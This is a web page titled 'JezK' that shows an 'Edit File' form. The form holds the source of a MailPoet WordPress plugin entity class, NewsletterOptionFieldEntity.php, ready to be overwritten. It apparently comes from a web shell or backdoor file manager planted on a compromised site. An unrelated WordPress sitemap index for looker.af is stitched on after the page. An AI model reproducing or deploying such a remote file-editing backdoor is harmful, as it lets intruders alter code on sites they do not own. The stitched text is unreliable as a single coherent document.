
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: NewsletterOptionFieldEntity.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php // phpcs:ignore SlevomatCodingStandard.TypeHints.DeclareStrictTypes.DeclareStrictTypesMissing

namespace MailPoet\Entities;

if (!defined(&#039;ABSPATH&#039;)) exit;


use MailPoet\Doctrine\EntityTraits\AutoincrementedIdTrait;
use MailPoet\Doctrine\EntityTraits\CreatedAtTrait;
use MailPoet\Doctrine\EntityTraits\UpdatedAtTrait;
use MailPoetVendor\Doctrine\ORM\Mapping as ORM;
use MailPoetVendor\Symfony\Component\Validator\Constraints as Assert;

/**
 * @ORM\Entity()
 * @ORM\Table(name=&quot;newsletter_option_fields&quot;)
 */
class NewsletterOptionFieldEntity {
  // names
  public const NAME_AFTER_TIME_NUMBER = &#039;afterTimeNumber&#039;;
  public const NAME_AFTER_TIME_TYPE = &#039;afterTimeType&#039;;
  public const NAME_EVENT = &#039;event&#039;;
  public const NAME_GROUP = &#039;group&#039;;
  public const NAME_INTERVAL_TYPE = &#039;intervalType&#039;;
  public const NAME_IS_SCHEDULED = &#039;isScheduled&#039;;
  public const NAME_META = &#039;meta&#039;;
  public const NAME_MONTH_DAY = &#039;monthDay&#039;;
  public const NAME_NTH_WEEK_DAY = &#039;nthWeekDay&#039;;
  public const NAME_ROLE = &#039;role&#039;;
  public const NAME_SCHEDULE = &#039;schedule&#039;;
  public const NAME_SCHEDULED_AT = &#039;scheduledAt&#039;;
  public const NAME_SEGMENT = &#039;segment&#039;;
  public const NAME_SEND_TO = &#039;sendTo&#039;;
  public const NAME_TIME_OF_DAY = &#039;timeOfDay&#039;;
  public const NAME_WEEK_DAY = &#039;weekDay&#039;;
  public const NAME_AUTOMATION_ID = &#039;automationId&#039;;
  public const NAME_AUTOMATION_STEP_ID = &#039;automationStepId&#039;;
  public const NAME_FILTER_SEGMENT_ID = &#039;filterSegmentId&#039;;

  use AutoincrementedIdTrait;
  use CreatedAtTrait;
  use UpdatedAtTrait;

  /**
   * @ORM\Column(type=&quot;string&quot;)
   * @Assert\NotBlank()
   * @var string
   */
  private $name;

  /**
   * @ORM\Column(type=&quot;string&quot;)
   * @Assert\NotBlank()
   * @var string
   */
  private $newsletterType;

  /**
   * @return string
   */
  public function getName() {
    return $this-&gt;name;
  }

  /**
   * @param string $name
   */
  public function setName($name) {
    $this-&gt;name = $name;
  }

  /**
   * @return string
   */
  public function getNewsletterType() {
    return $this-&gt;newsletterType;
  }

  /**
   * @param string $newsletterType
   */
  public function setNewsletterType($newsletterType) {
    $this-&gt;newsletterType = $newsletterType;
  }
}
</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://looker.af/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://looker.af/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://looker.af/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
